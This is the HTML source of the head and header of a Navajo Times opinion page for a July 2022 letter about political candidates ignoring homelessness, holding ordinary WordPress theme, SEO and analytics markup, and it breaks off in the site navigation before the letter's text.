<!DOCTYPE html>
<!--[if IE 6]>
<html id="ie6" lang="en-US">
<![endif]-->
<!--[if IE 7]>
<html id="ie7" lang="en-US">
<![endif]-->
<!--[if IE 8]>
<html id="ie8" lang="en-US">
<![endif]-->
<!--[if !(IE 6) | !(IE 7) | !(IE 8)  ]><!-->
<html lang="en-US">
<!--<![endif]-->
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://navajotimes.com/xmlrpc.php" />
<!--[if lt IE 9]>
	<script src="https://navajotimes.com/wp-content/themes/Extra/scripts/ext/html5.js" type="text/javascript"></script>
	<![endif]--> 

<script type="text/javascript">
		document.documentElement.className = 'js';
	</script>
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin /><style id="et-builder-googlefonts-cached-inline">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</style><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' />
<script type="text/javascript">
			let jqueryParams=[],jQuery=function(r){return jqueryParams=[...jqueryParams,r],jQuery},$=function(r){return jqueryParams=[...jqueryParams,r],$};window.jQuery=jQuery,window.$=jQuery;let customHeadScripts=!1;jQuery.fn=jQuery.prototype={},$.fn=jQuery.prototype={},jQuery.noConflict=function(r){if(window.jQuery)return jQuery=window.jQuery,$=window.jQuery,customHeadScripts=!0,jQuery.noConflict},jQuery.ready=function(r){jqueryParams=[...jqueryParams,r]},$.ready=function(r){jqueryParams=[...jqueryParams,r]},jQuery.load=function(r){jqueryParams=[...jqueryParams,r]},$.load=function(r){jqueryParams=[...jqueryParams,r]},jQuery.fn.ready=function(r){jqueryParams=[...jqueryParams,r]},$.fn.ready=function(r){jqueryParams=[...jqueryParams,r]};</script>
	<!-- This site is optimized with the Yoast SEO plugin v19.4 - https://yoast.com/wordpress/plugins/seo/ -->
	<title>Letters | Same old political promises - Navajo Times</title>
	<link rel="canonical" href="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/" />
	<meta property="og:locale" content="en_US" />
	<meta property="og:type" content="article" />
	<meta property="og:title" content="Letters | Same old political promises - Navajo Times" />
	<meta property="og:description" content="What I find appalling after reading this story (“Homeless woman dies in abandoned trailer after giving birth,” June 30, 2022) was the fact that none of the political candidates (presidential or chapter) offered condolences or an inkling of any solutions to address homelessness or mental health." />
	<meta property="og:url" content="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/" />
	<meta property="og:site_name" content="Navajo Times" />
	<meta property="article:publisher" content="https://facebook.com/navajotimes" />
	<meta property="article:author" content="https://facebook.com/navajotimes" />
	<meta property="article:published_time" content="2022-07-28T09:30:22+00:00" />
	<meta property="article:modified_time" content="2022-07-27T21:53:24+00:00" />
	<meta property="og:image" content="https://navajotimes.com/wp-content/uploads/2014/09/writing-letters.jpg" />
	<meta property="og:image:width" content="400" />
	<meta property="og:image:height" content="250" />
	<meta property="og:image:type" content="image/jpeg" />
	<meta name="author" content="Navajo Times" />
	<meta name="twitter:card" content="summary_large_image" />
	<meta name="twitter:creator" content="@https://twitter.com/navajotimes.com" />
	<meta name="twitter:site" content="@navajotimes" />
	<meta name="twitter:label1" content="Written by" />
	<meta name="twitter:data1" content="Navajo Times" />
	<meta name="twitter:label2" content="Est. reading time" />
	<meta name="twitter:data2" content="11 minutes" />
	<script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://navajotimes.com/#organization","name":"Navajo Times","url":"https://navajotimes.com/","sameAs":["https://www.instagram.com/navajotimes/","https://www.youtube.com/c/NavajotimesAZ","https://en.wikipedia.org/wiki/Navajo_Times","https://facebook.com/navajotimes","https://twitter.com/navajotimes"],"logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://navajotimes.com/#/schema/logo/image/","url":"https://navajotimes.com/wp-content/uploads/2020/02/NT-Nameplate-2020-web-mast.png","contentUrl":"https://navajotimes.com/wp-content/uploads/2020/02/NT-Nameplate-2020-web-mast.png","width":665,"height":140,"caption":"Navajo Times"},"image":{"@id":"https://navajotimes.com/#/schema/logo/image/"}},{"@type":"WebSite","@id":"https://navajotimes.com/#website","url":"https://navajotimes.com/","name":"Navajo Times","description":"Diné bi Naltsoos","publisher":{"@id":"https://navajotimes.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://navajotimes.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/#primaryimage","url":"https://navajotimes.com/wp-content/uploads/2014/09/writing-letters.jpg","contentUrl":"https://navajotimes.com/wp-content/uploads/2014/09/writing-letters.jpg","width":400,"height":250,"caption":"Writing letters editor"},{"@type":"WebPage","@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/","url":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/","name":"Letters | Same old political promises - Navajo Times","isPartOf":{"@id":"https://navajotimes.com/#website"},"primaryImageOfPage":{"@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/#primaryimage"},"image":{"@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/#primaryimage"},"thumbnailUrl":"https://navajotimes.com/wp-content/uploads/2014/09/writing-letters.jpg","datePublished":"2022-07-28T09:30:22+00:00","dateModified":"2022-07-27T21:53:24+00:00","breadcrumb":{"@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://navajotimes.com/opinion/letters/letters-same-old-political-promises/"]}]},{"@type":"BreadcrumbList","@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://navajotimes.com/"},{"@type":"ListItem","position":2,"name":"Letters | Same old political promises"}]},{"@type":"Article","@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/#article","isPartOf":{"@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/"},"author":{"name":"Navajo Times","@id":"https://navajotimes.com/#/schema/person/e87a55689deabb6cfbe1dcccd71ce40c"},"headline":"Letters | Same old political promises","datePublished":"2022-07-28T09:30:22+00:00","dateModified":"2022-07-27T21:53:24+00:00","mainEntityOfPage":{"@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/"},"wordCount":2175,"publisher":{"@id":"https://navajotimes.com/#organization"},"image":{"@id":"https://navajotimes.com/opinion/letters/letters-same-old-political-promises/#primaryimage"},"thumbnailUrl":"https://navajotimes.com/wp-content/uploads/2014/09/writing-letters.jpg","articleSection":["Letters"],"inLanguage":"en-US"},{"@type":"Person","@id":"https://navajotimes.com/#/schema/person/e87a55689deabb6cfbe1dcccd71ce40c","name":"Navajo Times","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://navajotimes.com/#/schema/person/image/","url":"https://navajotimes.com/wp-content/uploads/2020/02/NTPC-favicon-1-150x150.png","contentUrl":"https://navajotimes.com/wp-content/uploads/2020/02/NTPC-favicon-1-150x150.png","caption":"Navajo Times"},"sameAs":["https://navajotimes.com","https://facebook.com/navajotimes","https://twitter.com/https://twitter.com/navajotimes.com"],"url":"https://navajotimes.com/author/ntpc_admin/"}]}</script>
	<!-- / Yoast SEO plugin. -->


<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//js.stripe.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//v0.wordpress.com' />
<link rel="alternate" type="application/rss+xml" title="Navajo Times &raquo; Feed" href="https://navajotimes.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Navajo Times &raquo; Comments Feed" href="https://navajotimes.com/comments/feed/" />
<link rel="alternate" type="text/calendar" title="Navajo Times &raquo; iCal Feed" href="https://navajotimes.com/events/?ical=1" />
		<!-- This site uses the Google Analytics by MonsterInsights plugin v8.7.0 - Using Analytics tracking - https://www.monsterinsights.com/ -->
							<script src="//www.googletagmanager.com/gtag/js?id=UA-10880344-1"  data-cfasync="false" data-wpfc-render="false" type="text/javascript" async></script>
			<script data-cfasync="false" data-wpfc-render="false" type="text/javascript">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</script>
				<!-- / Google Analytics by MonsterInsights -->
		<meta content="Extra Child Theme v.4.10.4" name="generator"/><link rel='stylesheet' id='tribe-events-pro-mini-calendar-block-styles-css'  href='https://navajotimes.com/wp-content/plugins/events-calendar-pro/src/resources/css/tribe-events-pro-mini-calendar-block.min.css?ver=5.14.4' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='https://navajotimes.com/wp-includes/css/dist/block-library/style.min.css?ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' type='text/css' media='all' />
<style id='wp-block-library-inline-css' type='text/css'>
.has-text-align-justify{text-align:justify;}
</style>
<style id='wp-block-library-theme-inline-css' type='text/css'>
.wp-block-audio figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:hsla(0,0%,100%,.65)}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:hsla(0,0%,100%,.65)}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{color:hsla(0,0%,100%,.65)}.wp-block-pullquote{border-top:4px solid;border-bottom:4px solid;margin-bottom:1.75em;color:currentColor}.wp-block-pullquote__citation,.wp-block-pullquote cite,.wp-block-pullquote footer{color:currentColor;text-transform:uppercase;font-size:.8125em;font-style:normal}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;position:relative;font-style:normal}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-separator.has-css-opacity{opacity:.4}.wp-block-separator{border:none;border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){border-bottom:none;height:1px}.wp-block-separator.has-background:not(.is-style-wide):not(.is-style-dots){height:2px}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{padding:.5em;border:1px solid;word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}
</style>
<link rel='stylesheet' id='mediaelement-css'  href='https://navajotimes.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://navajotimes.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' type='text/css' media='all' />
<style id='global-styles-inline-css' type='text/css'>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</style>
<link rel='stylesheet' id='awesome-weather-css'  href='https://navajotimes.com/wp-content/plugins/awesome-weather/awesome-weather.css?ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' type='text/css' media='all' />
<style id='awesome-weather-inline-css' type='text/css'>
.awesome-weather-wrap { font-family: 'Open Sans', sans-serif; font-weight: 400; font-size: 14px; line-height: 14px; }
</style>
<link rel='stylesheet' id='opensans-googlefont-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400&#038;ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' type='text/css' media='all' />
<link rel='stylesheet' id='ppress-frontend-css'  href='https://navajotimes.com/wp-content/plugins/wp-user-avatar/assets/css/frontend.min.css?ver=3.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='ppress-flatpickr-css'  href='https://navajotimes.com/wp-content/plugins/wp-user-avatar/assets/flatpickr/flatpickr.min.css?ver=3.2.16' type='text/css' media='all' />
<link rel='stylesheet' id='ppress-select2-css'  href='https://navajotimes.com/wp-content/plugins/wp-user-avatar/assets/select2/select2.min.css?ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' type='text/css' media='all' />
<link rel='stylesheet' id='issuem-leaky-paywall-css'  href='https://navajotimes.com/wp-content/plugins/leaky-paywall//css/issuem-leaky-paywall.css?ver=4.18.3' type='text/css' media='all' />
<link rel='stylesheet' id='extra-style-parent-css'  href='https://navajotimes.com/wp-content/themes/Extra/style-static.min.css?ver=4.17.6' type='text/css' media='all' />
<link rel='stylesheet' id='child-style-css'  href='https://navajotimes.com/wp-content/themes/Extra-child/style.css?ver=4.17.6' type='text/css' media='all' />
<link rel='stylesheet' id='extra-style-css'  href='https://navajotimes.com/wp-content/themes/Extra-child/style.css?ver=4.17.6' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='https://navajotimes.com/wp-content/plugins/jetpack/css/jetpack.css?ver=11.1.2' type='text/css' media='all' />
<script type='text/javascript' id='jetpack_related-posts-js-extra'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20211209' id='jetpack_related-posts-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.7.0' id='monsterinsights-frontend-script-js'></script>
<script data-cfasync="false" data-wpfc-render="false" type="text/javascript" id='monsterinsights-frontend-script-js-extra'>/* <![CDATA[ */
var monsterinsights_frontend = {"js_events_tracking":"true","download_extensions":"doc,pdf,ppt,zip,xls,docx,pptx,xlsx","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"https:\/\/navajotimes.com","hash_tracking":"false","ua":"UA-10880344-1","v4_id":"G-YS00NVD0FC"};/* ]]> */
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' id='jquery-js-after'>
jqueryParams.length&&$.each(jqueryParams,function(e,r){if("function"==typeof r){var n=String(r);n.replace("$","jQuery");var a=new Function("return "+n)();$(document).ready(a)}});
</script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/wp-user-avatar/assets/flatpickr/flatpickr.min.js?ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' id='ppress-flatpickr-js'></script>
<script type='text/javascript' src='https://navajotimes.com/wp-content/plugins/wp-user-avatar/assets/select2/select2.min.js?ver=cabf1dacd7eaf9ff5cd4eccb2aea521f' id='ppress-select2-js'></script>
<link rel="https://api.w.org/" href="https://navajotimes.com/wp-json/" /><link rel="alternate" type="application/json" href="https://navajotimes.com/wp-json/wp/v2/posts/71217" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://navajotimes.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://navajotimes.com/wp-includes/wlwmanifest.xml" /> 

<link rel='shortlink' href='https://wp.me/pacMu1-iwF' />
<link rel="alternate" type="application/json+oembed" href="https://navajotimes.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnavajotimes.com%2Fopinion%2Fletters%2Fletters-same-old-political-promises%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://navajotimes.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fnavajotimes.com%2Fopinion%2Fletters%2Fletters-same-old-political-promises%2F&#038;format=xml" />
<meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="https://navajotimes.com"><link rel="alternate" href="https://navajotimes.com/wp-json/tribe/events/v1/" /><style>img#wpstats{display:none}</style>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /><!-- following in theme options, head integration -->
<link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Raleway">	
<script async>
		//replace Posted by with simple byline
    jQuery(document).ready(function() {

    	//jQuery(".post-meta p").text(function(index, text) {
    	//return text.replace('Posted by', 'By');
		//});
		jQuery(".tribe-events-duration span").text(function(index, text) {
    	return text.replace(':00', ' ');
		});
		
	var year = new Date();
	year = year.getFullYear();
	jQuery(function($){
	$('#footer-info').html('&copy; ' + year + ' <a href="https://navajotimes.com">Navajo Times Publishing Co., Inc.</a>');
});		
// if no featured image hide empty div containing whitespace
		$('div.header').each(function(){
  if($(this).children().length == 0){
    $(this).hide();
  }
});
		
//end doc ready below		
    });
  </script>
<script async>
jQuery( document ).ready(function() {
	jQuery('.vcard p').contents().filter(function() {
		return this.nodeType == 3
	}).each(function(){
    this.textContent = this.textContent.replace('Posted by','By');
});
}); 
</script>
<style>
	#main-content {
     padding-top: 30px!important;
	}
</style>
<script src="https://use.fontawesome.com/a90ba7156a.js" async></script>
<link rel="stylesheet" type="text/css" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.2.0/css/all.css" integrity="sha384-hWVjflwFxL6sNzntih27bfxkr27PmbbK/iSvJ+a4+0owXq79v+lsFkW54bOGbiDQ" crossorigin="anonymous">
<link rel="stylesheet" type="text/css" href="https://use.fontawesome.com/releases/v5.13.0/css/all.css">
<!-- GA tracking starts -->
<!-- Global site tag (gtag.js) - Google Analytics -->
<!-- already appears via MonsterInsights plugin <script async src="https://www.googletagmanager.com/gtag/js?id=UA-10880344-1"></script>--&gt;
<!-- already appears via MonsterInsights plugin 
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-10880344-1');
</script> -->
<!-- GA tracking ends -->
<!-- Google Tag Manager -->
<!-- already appears via MonsterInsights plugin 
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-WHNHR32');</script>-->
<!-- End Google Tag Manager -->
<!-- Global site tag (gtag.js) - Google Analytics -->
<!-- already appears via MonsterInsights plugin
<script async src="https://www.googletagmanager.com/gtag/js?id=G-YS00NVD0FC"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-YS00NVD0FC');
</script>-->
<!-- end theme options, head integration section --><link rel="icon" href="https://navajotimes.com/wp-content/uploads/2020/02/cropped-NTPC-favicon-1-32x32.png" sizes="32x32" />
<link rel="icon" href="https://navajotimes.com/wp-content/uploads/2020/02/cropped-NTPC-favicon-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon" href="https://navajotimes.com/wp-content/uploads/2020/02/cropped-NTPC-favicon-1-180x180.png" />
<meta name="msapplication-TileImage" content="https://navajotimes.com/wp-content/uploads/2020/02/cropped-NTPC-favicon-1-270x270.png" />
<style id="et-extra-customizer-global-cached-inline-styles">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</style></head>
<body data-rsssl=1 class="post-template-default single single-post postid-71217 single-format-standard tribe-no-js et_extra et_fixed_nav et_pb_gutters3 et_primary_nav_dropdown_animation_Default et_secondary_nav_dropdown_animation_Default with_sidebar with_sidebar_right et_includes_sidebar et-db">
<div id="page-container" class="page-container">
<!-- Header -->
<header class="header centered">
	   <!-- #top-header -->
  <div id="top-header" style="">
    <div class="container"> 
      
      <!-- Secondary Nav -->
            <div id="et-secondary-nav" class="et-trending">
                
        <!-- ET Trending -->
        <div id="et-trending"> 
          
          <!-- ET Trending Button --> 
          <a id="et-trending-button" href="#" title=""> <span></span> <span></span> <span></span> </a> 
          
          <!-- ET Trending Label -->
          <h4 id="et-trending-label">
            TRENDING:          </h4>
          
          <!-- ET Trending Post Loop -->
          <div id='et-trending-container'>
                                    <div id="et-trending-post-45465" class="et-trending-post et-trending-latest"> <a href="https://navajotimes.com/rezsports/wrestling/being-cut-from-b-ball-fortuitous-for-kc-wrestler/">Being cut from b-ball fortuitous for KC wrestler</a> </div>
                        <div id="et-trending-post-47959" class="et-trending-post"> <a href="https://navajotimes.com/ae/community/irish-pay-forward-173-year-old-favor/">Irish ‘pay forward’ 173-year-old favor</a> </div>
                        <div id="et-trending-post-70446" class="et-trending-post"> <a href="https://navajotimes.com/ae/culture/dark-winds-fails-authenticity-test/">‘Dark Winds’ fails authenticity test</a> </div>
                                  </div>
        </div>
        <ul id="et-secondary-menu" class="nav"><li id="menu-item-30470" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30470"><a href="https://navajotimes.com/contact-us/subscriptions/">Subscribe</a></li>
<li id="menu-item-30473" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30473"><a href="https://navajotimes.com/contact-us/where-to-buy-the-times/">Where to Buy the Times</a></li>
<li id="menu-item-30468" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-30468"><a href="https://navajotimes.com/contact-us/contact-us-full/">How to reach us</a>
<ul class="sub-menu">
	<li id="menu-item-30469" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30469"><a href="https://navajotimes.com/contact-us/">Contact Us</a></li>
</ul>
</li>
<li id="menu-item-30471" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30471"><a href="https://navajotimes.com/contact-us/subscriptions/navajo-times-back-issues/">Navajo Times Back Issues</a></li>
<li id="menu-item-30472" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30472"><a href="https://navajotimes.com/contact-us/jobs-at-the-times/">Job Opportunities at the Times</a></li>
</ul>              </div>
            
      <!-- #et-info -->
      <div id="et-info">
                
        <!-- .et-extra-social-icons -->
        <ul class="et-extra-social-icons" style="">
                                                            <li class="et-extra-social-icon facebook"> <a href="https://facebook.com/navajotimes" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-facebook"></a> </li>
                                                            <li class="et-extra-social-icon twitter"> <a href="https://twitter.com/navajotimes" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-twitter"></a> </li>
                                                                                                                                                                                                                                                                    <li class="et-extra-social-icon instagram"> <a href="https://instagram.com/navajotimes" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-instagram"></a> </li>
                                                                                                                                                                                                                                                                                                                                                    <li class="et-extra-social-icon youtube"> <a href="https://www.youtube.com/c/NavajotimesAZ" class="et-extra-icon et-extra-icon-background-hover et-extra-icon-youtube"></a> </li>
                                                                                                                                                                                                                                    </ul>
                
        <!-- .et-top-search -->
                <div class="et-top-search" style="">
                    <div id="google-ntpc-cse" style=""> 
            <script>
								  (function() {
									var cx = '001405029538538746178:zholwyvue04';
									var gcse = document.createElement('script');
									gcse.type = 'text/javascript';
									gcse.async = true;
									gcse.src = 'https://cse.google.com/cse.js?cx=' + cx;
									var s = document.getElementsByTagName('script')[0];
									s.parentNode.insertBefore(gcse, s);
								  })();
									window.onload = function(){
document.getElementById('gsc-i-id1').placeholder = 'Search';
};
								</script>
            <gcse:searchbox-only></gcse:searchbox-only>
          </div>
        </div>
                
        <!-- cart -->
              </div>
    </div>
    <!-- /.container --> 
  </div>
  <!-- /#top-header -->
  
    
  <!-- Main Header -->
  <div id="main-header-wrapper">
    <div id="main-header" data-fixed-height="60">
      <div class="container"> 
        <!-- ET Ad -->
                        
        <!-- Logo -->
        <div style="display:block;width:100%;margin:0 auto"><a class="logo" href="https://navajotimes.com/" data-fixed-height="60"> <img src="https://navajotimes.com/wp-content/uploads/2020/02/NT-Nameplate-2020-web-350x64-1.png" alt="Navajo Times" id="logo" /> </a>
          <div class="header-date-time">
            Thursday, July 28, 2022              <a href="/weather">
            <div id="awesome-weather-window-rock-az" class="custom-bg-color awesome-weather-wrap awecf awe_without_stats awe_with_icons awe_without_forecast  awe_basic awe-code-rain awe-desc-mostly-cloudy"  style=" background-color: #ffffff; color: #000000; ">
	
		
	
		<span class="awesome-weather-stats-icon"><i class="wi wi-forecast-io-rain"></i></span>		<span class="awesome-weather-current-temp">60<sup>&deg;</sup></span><!-- /.awesome-weather-current-temp -->
		<span class="awe_desc">Mostly Cloudy</span>
	
			
		
		
	
		
		
		
	</div><!-- /.awesome-weather-wrap: basic -->                 in Window Rock </a>
          </div>
        </div>
                
        <!-- ET Navigation -->
        <div id="et-navigation" class="">
          <ul id="et-menu" class="nav et_disable_top_tier"><li id="menu-item-46217" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-46217"><a href="https://navajotimes.com/coronavirus-updates/">CORONAVIRUS</a>
<ul class="sub-menu">
	<li id="menu-item-46315" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-46315"><a href="https://navajotimes.com/coronavirus-updates/">All updates</a></li>
</ul>
</li>
<li id="menu-item-30533" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-30533"><a href="https://navajotimes.com/ae/">Life</a></li>
<li id="menu-item-28847" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28847"><a href="https://navajotimes.com/biz/">Business</a></li>
<li id="menu-item-28848" class="menu-item menu-item-type-taxonomy menu-item-object-category mega-menu menu-item-has-children mega-menu-featured mega-featured-2 menu-item-28848"><a href="https://navajotimes.com/reznews/">News</a><ul class="sub-menu" style="border-top-color: #000000;">
					<li>
						<h2 class="title">Featured</h2>
						<div class="featured-post">
							<a href="https://navajotimes.com/reznews/aging-marines-hogan-sees-slow-progress/" title="Aging Marine’s hogan sees slow progress" class="featured-image">
				<img src="https://navajotimes.com/wp-content/uploads/2022/07/dq-vet-home-build22-440x264.jpg" alt="Aging Marine’s hogan sees slow progress" />
			</a>
							<h2>Aging Marine’s hogan sees slow progress</h2>
							<div class="post-meta">
								<span class="updated">Jul 28, 2022</span> | <a href="https://navajotimes.com/reznews/" rel="tag">News</a> | <span class="rating-stars" title="Rating: 0.00"><span class="post-meta-icon rating-star rating-star-empty rating-star-1"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-2"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-3"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-4"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-5"></span>
</span>
							</div>
						</div>
					</li>
					<li>
						<h2 class="title">Featured</h2>
						<div class="featured-post">
							<a href="https://navajotimes.com/reznews/vietnam-vet-still-waiting-40-years-later/" title="Vietnam vet still waiting, 40 years later" class="featured-image">
				<img src="https://navajotimes.com/wp-content/themes/Extra/images/post-format-icon-text.svg" alt="Vietnam vet still waiting, 40 years later" />
			</a>
							<h2>Vietnam vet still waiting, 40 years later</h2>
							<div class="post-meta">
								<span class="updated">Jul 28, 2022</span> | <a href="https://navajotimes.com/reznews/" rel="tag">News</a> | <span class="rating-stars" title="Rating: 0.00"><span class="post-meta-icon rating-star rating-star-empty rating-star-1"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-2"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-3"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-4"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-5"></span>
</span>
							</div>
						</div>
					</li><li class="menu-item menu-item-has-children"><a href="#" class="title">Recent</a><ul class="recent-list">
					<li class="recent-post">
						<div class="post-content">
							<a href="https://navajotimes.com/reznews/nez-touts-success-of-arpa-spending-plan/" title="Nez touts success of ARPA spending plan">
				<img src="https://navajotimes.com/wp-content/uploads/2022/07/SUBMITTED-OPVP-address-150x150.jpg" alt="Nez touts success of ARPA spending plan" class="post-thumbnail" />
			</a>
							<div class="post-meta">
								<h3><a href="https://navajotimes.com/reznews/nez-touts-success-of-arpa-spending-plan/">Nez touts success of ARPA spending plan</a></h3>
								by <a href="https://navajotimes.com/author/rkrisst/" class="url fn" title="Posts by Rima Krisst" rel="author">Rima Krisst</a> | <span class="updated">Jul 22, 2022</span> | <a class="comments-link" href="https://navajotimes.com/reznews/nez-touts-success-of-arpa-spending-plan/#comments">0 <span title="comment count" class="comment-bubble post-meta-icon"></span></a>
							</div>
						</div>
					</li>
					<li class="recent-post">
						<div class="post-content">
							<a href="https://navajotimes.com/reznews/capital-briefs-senate-committee-supports-tso-as-ihs-director/" title="Capital Briefs | Senate committee supports Tso as IHS director">
				<img src="https://navajotimes.com/wp-content/themes/Extra/images/post-format-icon-text.svg" alt="Capital Briefs | Senate committee supports Tso as IHS director" class="post-thumbnail" />
			</a>
							<div class="post-meta">
								<h3><a href="https://navajotimes.com/reznews/capital-briefs-senate-committee-supports-tso-as-ihs-director/">Capital Briefs | Senate committee supports Tso as IHS director</a></h3>
